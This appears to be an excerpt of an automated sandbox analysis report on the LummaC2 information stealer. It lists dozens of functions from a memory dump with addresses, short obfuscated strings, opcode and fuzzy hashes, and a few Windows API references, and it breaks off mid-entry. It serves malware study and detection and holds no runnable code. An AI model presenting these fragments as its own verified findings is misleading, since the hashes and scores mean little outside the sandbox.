                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Ds$]f$}v$y
                                              • API String ID: 0-176802088
                                              • Opcode ID: d9a48bbb58bd941ed45aaacb8977b1585ed284fc3906ae673118165d6023c4d4
                                              • Instruction ID: 125408fbfe8b8fa3f01ae1d670bd36baf4ccd603a73c12f30cd60f1b4e8a074e
                                              • Opcode Fuzzy Hash: d9a48bbb58bd941ed45aaacb8977b1585ed284fc3906ae673118165d6023c4d4
                                              • Instruction Fuzzy Hash: D9B104B25493928BD335CF28C8947FBBBE1EBD6304F19892CC4E99B252D77445058B93
                                              Function 00E18F30 Relevance: 5.3, Strings: 4, Instructions: 307COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: edg$(RSP$5^>\$8V"T
                                              • API String ID: 0-3485013536
                                              • Opcode ID: 8b64f046d4ece73c21a7897c3cb701c2364d71aa999ccf9e67df4264ac4db194
                                              • Instruction ID: cd1ea5de6ff05725327c86c000f20f969e555016eda5c5c58774526ca101d9e5
                                              • Opcode Fuzzy Hash: 8b64f046d4ece73c21a7897c3cb701c2364d71aa999ccf9e67df4264ac4db194
                                              • Instruction Fuzzy Hash: 8E911171208305EFD7048F29E8557AABBF4FF85308F14582CF682A72A2E7359985CB52
                                              Function 00DF9000 Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: EWKU$L^JS$S$X
                                              • API String ID: 0-2602999304
                                              • Opcode ID: f50cef82152ac2470336791869d6125d6980e3bcba897b330b04369c4a149ec8
                                              • Instruction ID: 1ce421672e75c2c38fabed5066d80f7532a735d0ef49ce57efe847a743356aff
                                              • Opcode Fuzzy Hash: f50cef82152ac2470336791869d6125d6980e3bcba897b330b04369c4a149ec8
                                              • Instruction Fuzzy Hash: 7471E42050C3C68AD7118F69846437BFFE19F93354F18899DE5D09B282C379C90ACB66
                                              Function 00E1EFB0 Relevance: 5.3, Strings: 4, Instructions: 261COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3*58$7+A!$_$y
                                              • API String ID: 0-982251264
                                              • Opcode ID: 18b5c3e37de5d5cca378f1ad64870544e27adaea74e3fb9df930c4349b3347b9
                                              • Instruction ID: 9bf0931a2203d385069442bd02ce0e32fb7ddded657e5d3479d875eb6afc54e3
                                              • Opcode Fuzzy Hash: 18b5c3e37de5d5cca378f1ad64870544e27adaea74e3fb9df930c4349b3347b9
                                              • Instruction Fuzzy Hash: AC91B07160D3C18BD338CF2985913EBBBE2ABD6304F588A2DD4D95B381DB744545CB92
                                              Function 00DFF330 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4$A$Y$z
                                              • API String ID: 0-904608820
                                              • Opcode ID: 751b2d4bfb30265d085504a020eb36a21923b5fc5b4f21fcb5d624ea74c11b74
                                              • Instruction ID: 88022c2b5058da1b77f7d2649131596752af62b754f8b3ab946fd3f83fa7899f
                                              • Opcode Fuzzy Hash: 751b2d4bfb30265d085504a020eb36a21923b5fc5b4f21fcb5d624ea74c11b74
                                              • Instruction Fuzzy Hash: 1F61F97250D7948BD3208B38C4453AFFAD1ABC9324F1A8A3DDAE997382D239C8019753
                                              Function 00E33C60 Relevance: 4.4, Strings: 3, Instructions: 646COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2?$b>$r>
                                              • API String ID: 0-675963237
                                              • Opcode ID: 877ea1f48cd6d0c4005cb9344d1d7184e20e5c7373dbd9adbb4980f49cf4a392
                                              • Instruction ID: e66c7e138abdf4855a788fc67e3a007f4fe3176767c1003a5f290f9f973b7676
                                              • Opcode Fuzzy Hash: 877ea1f48cd6d0c4005cb9344d1d7184e20e5c7373dbd9adbb4980f49cf4a392
                                              • Instruction Fuzzy Hash: 75120236619314CFC308CF29E89465ABBE2FBC8314F0A897DD889A7391D775D949CB81
                                              Function 00E09880 Relevance: 4.4, Strings: 3, Instructions: 634COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3cmc$^A$djtc
                                              • API String ID: 0-2924278915
                                              • Opcode ID: 6a426ad0245c25c4461712b44fa668919a4177c09fa34575abf2d047420c8363
                                              • Instruction ID: a71430063873ea5d67d88d5920a9a167d57f968a07d50b056b167d84e842e155
                                              • Opcode Fuzzy Hash: 6a426ad0245c25c4461712b44fa668919a4177c09fa34575abf2d047420c8363
                                              • Instruction Fuzzy Hash: F922F2B55007018FD7248F29C891B62B7F2FF95324F18866CD4AA8B7A2D735F885CB91
                                              Function 00E33DC0 Relevance: 4.3, Strings: 3, Instructions: 546COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2?$b>$r>
                                              • API String ID: 0-675963237
                                              • Opcode ID: 1edefc79851c9d34dc8e56cbdc348725b414255b0a4c4eab451cbc544fcbe347
                                              • Instruction ID: feb565cadf50c5be28ce3fbf860b4e17ff288fd264da1b1eeff8c8d538fac0c0
                                              • Opcode Fuzzy Hash: 1edefc79851c9d34dc8e56cbdc348725b414255b0a4c4eab451cbc544fcbe347
                                              • Instruction Fuzzy Hash: 44F10176609314CFC708CF29E89466ABBE2FBC8315F1A897CD885A7391D774D849CB81
                                              Function 00E13500 Relevance: 4.2, Strings: 3, Instructions: 459COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )Z(X$:\Z|$EB
                                              • API String ID: 0-2196627806
                                              • Opcode ID: 5931074c1617d487239f2ad9eeec10c7dbee895d16087f0cf93098e3c3bf3c4e
                                              • Instruction ID: 9cd8809df721bd65507024fb9a9329f049db45e05e6c7bad58157bd435f6071d
                                              • Opcode Fuzzy Hash: 5931074c1617d487239f2ad9eeec10c7dbee895d16087f0cf93098e3c3bf3c4e
                                              • Instruction Fuzzy Hash: AEC118B1A083109BD714DF24C8917ABB7E1EF95328F18952CF8C5A7385E374DA49C792
                                              Function 00DFADD0 Relevance: 4.2, Strings: 3, Instructions: 412COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8g$PG$~}
                                              • API String ID: 0-2796767324
                                              • Opcode ID: cd198da4b2671acfa6d4bf0c51129600960ee26de728bc4d4b0c3805fe8447f3
                                              • Instruction ID: 3c8b82f3b619a221f094b5e7df614d170ede9f349851636b01b4925f2af29c81
                                              • Opcode Fuzzy Hash: cd198da4b2671acfa6d4bf0c51129600960ee26de728bc4d4b0c3805fe8447f3
                                              • Instruction Fuzzy Hash: C8D1F37260C3548BD324CF64C8513BFBBE2ABC2314F49892DE9D59B381D779C90987A6
                                              Function 00E21168 Relevance: 4.2, Strings: 3, Instructions: 400COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3P$C--1$FN
                                              • API String ID: 0-3627293634
                                              • Opcode ID: 06b06e813f9e9ee5381a06f4226ada9d5f4053fa313cefb0ada0cbdc4e13d419
                                              • Instruction ID: 32a51fa7f574c7de95aff6f1abd7e41eacd8ea770695ae16d2080adcf46dc07c
                                              • Opcode Fuzzy Hash: 06b06e813f9e9ee5381a06f4226ada9d5f4053fa313cefb0ada0cbdc4e13d419
                                              • Instruction Fuzzy Hash: 02B1297150C3D18BD3298F3594503ABFFE1AFE6308F184A9DD4C967381D7798A068B56
                                              Function 00E0B5A0 Relevance: 4.0, Strings: 3, Instructions: 268COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <$a+$zak$^\
                                              • API String ID: 0-1385318057
                                              • Opcode ID: 003dfc2ba2f84d67ce1514e2c52676a3e514305f65fe2a53a2e7072cf45eadc8
                                              • Instruction ID: f1881eec5f59149967fda67e3f5766e50abc927b2659ee5e55297fb17297226d
                                              • Opcode Fuzzy Hash: 003dfc2ba2f84d67ce1514e2c52676a3e514305f65fe2a53a2e7072cf45eadc8
                                              • Instruction Fuzzy Hash: 5F8179729183518BC314CF28C8912A7BBE1FFD2324F099A1DE8D59B3A0D778C845CB92
                                              Function 00E170D0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 217COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: edg
                                              • API String ID: 0-1333089362
                                              • Opcode ID: 523d0cf75a97ae369541d19eb0c695c27870af779577db819036fd637ab2b896
                                              • Instruction ID: 553279c3b1a97d9cded832451c92e5b9bb0388480ccc79c13eadc9966f1c7ea2
                                              • Opcode Fuzzy Hash: 523d0cf75a97ae369541d19eb0c695c27870af779577db819036fd637ab2b896
                                              • Instruction Fuzzy Hash: 5B61067160C3449FE328CF6598517EFBBE5EBC5304F00893DEAA5AB281D7B59405CB92
                                              Function 00E06444 Relevance: 3.7, Strings: 2, Instructions: 1186COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: V0V6$f8]>
                                              • API String ID: 0-1051389075
                                              • Opcode ID: db6cda5e330f720e978176ca98e9831b0a4e92ac6a3e4740caa82fb67e6aa58b
                                              • Instruction ID: 52b0707a8560ba2816904f3d6dc0dfe5c65e194f36cee94a87efb67860992a4a
                                              • Opcode Fuzzy Hash: db6cda5e330f720e978176ca98e9831b0a4e92ac6a3e4740caa82fb67e6aa58b
                                              • Instruction Fuzzy Hash: 7D82DF70204601DFD728CF29D895B22BBF2FF4A318F18969CD496AB3E5D734A895CB50
                                              Function 00DF4D80 Relevance: 3.3, Strings: 2, Instructions: 797COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$8
                                              • API String ID: 0-46163386
                                              • Opcode ID: afbba03356a5abb5a6888a5096740e8d5c2235183f7c4e652aa1a3d75aa3bdbd
                                              • Instruction ID: b8f8f27b76c9609aae15f2f49f571249c0ed38fd2a6329787cbe2ac6f902c231
                                              • Opcode Fuzzy Hash: afbba03356a5abb5a6888a5096740e8d5c2235183f7c4e652aa1a3d75aa3bdbd
                                              • Instruction Fuzzy Hash: 727277715083449FD710CF18D880BABBBE1BF88314F19891DFA898B392D775D958CBA2
                                              Function 00E16E20 Relevance: 3.2, APIs: 2, Instructions: 247COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00E16F18
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00E16FA9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID:
                                              • API String ID: 237503144-0
                                              • Opcode ID: b0f2cf7883f4c49c030c21f407f576c7ca9f636b010c217b45d5ba69ab17e0b2
                                              • Instruction ID: c8f5ff33488e021cb8178d9cc5d0de29182a50421d2630c6df210cb2b403f293
                                              • Opcode Fuzzy Hash: b0f2cf7883f4c49c030c21f407f576c7ca9f636b010c217b45d5ba69ab17e0b2
                                              • Instruction Fuzzy Hash: 7371F271608354DFE714CF64E89075FBBF5EB85704F00892CFAA5AB280D7B19909CB92
                                              Function 00E1B2C3 Relevance: 3.2, APIs: 2, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00E1B3D2
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00E1B46C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID:
                                              • API String ID: 237503144-0
                                              • Opcode ID: e02508444eeaf1a51e8fd7a7e27b0101f31927c889d05329da1bc170d2f9f30d
                                              • Instruction ID: c6f65dcc657533f83c7ce8628ffaa272055b1048cb32000eb82a9ce64730ea22
                                              • Opcode Fuzzy Hash: e02508444eeaf1a51e8fd7a7e27b0101f31927c889d05329da1bc170d2f9f30d
                                              • Instruction Fuzzy Hash: AA8105B1608344DFD7248F55D8457ABBBE6FFC4308F44492DF589AB381EB7198498B82
                                              Function 00E0C9F0 Relevance: 3.2, Strings: 2, Instructions: 667COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -*$52
                                              • API String ID: 0-1700671224
                                              • Opcode ID: 1aeb43864a207e083c091015236e2e571862a0885dd352195e72154ee43703ad
                                              • Instruction ID: 43405236e7060afc30e1109633ea4af83d205994f0aaee9305d8883d467f7bc5
                                              • Opcode Fuzzy Hash: 1aeb43864a207e083c091015236e2e571862a0885dd352195e72154ee43703ad
                                              • Instruction Fuzzy Hash: 0312FC7260C3508BD314CF69C85166BBBF2EFC5318F08992CE4D99B391E7798949CB92
                                              Function 00E19C30 Relevance: 3.1, Strings: 2, Instructions: 629COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ctqv$ctqv
                                              • API String ID: 0-4260466429
                                              • Opcode ID: b1c0750ab5d31633cbac383ac1bf7f4a978079622842c4ce3dbac7e17510fa65
                                              • Instruction ID: 4132786d68b5ae6ddabaa2e2ede403e63e22a616ff87a8cf263244a17972a294
                                              • Opcode Fuzzy Hash: b1c0750ab5d31633cbac383ac1bf7f4a978079622842c4ce3dbac7e17510fa65
                                              • Instruction Fuzzy Hash: 2E22EEB050D3808FD7108F28D8557ABBBE1EFC6308F18496CE6C59B252E779D949CB92
                                              Function 00E1A648 Relevance: 2.9, Strings: 2, Instructions: 417COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '%<z$9%<z
                                              • API String ID: 0-816983374
                                              • Opcode ID: af8ddccf8c26b2fff36be1d8c7a3fe6f937ff20402170e2e568d7ce4ba8dcc19
                                              • Instruction ID: ba2cc8ebc3e98ba6f05747e6536c428dfd2bc0587ff17f701df22b8ddc8fce2c
                                              • Opcode Fuzzy Hash: af8ddccf8c26b2fff36be1d8c7a3fe6f937ff20402170e2e568d7ce4ba8dcc19
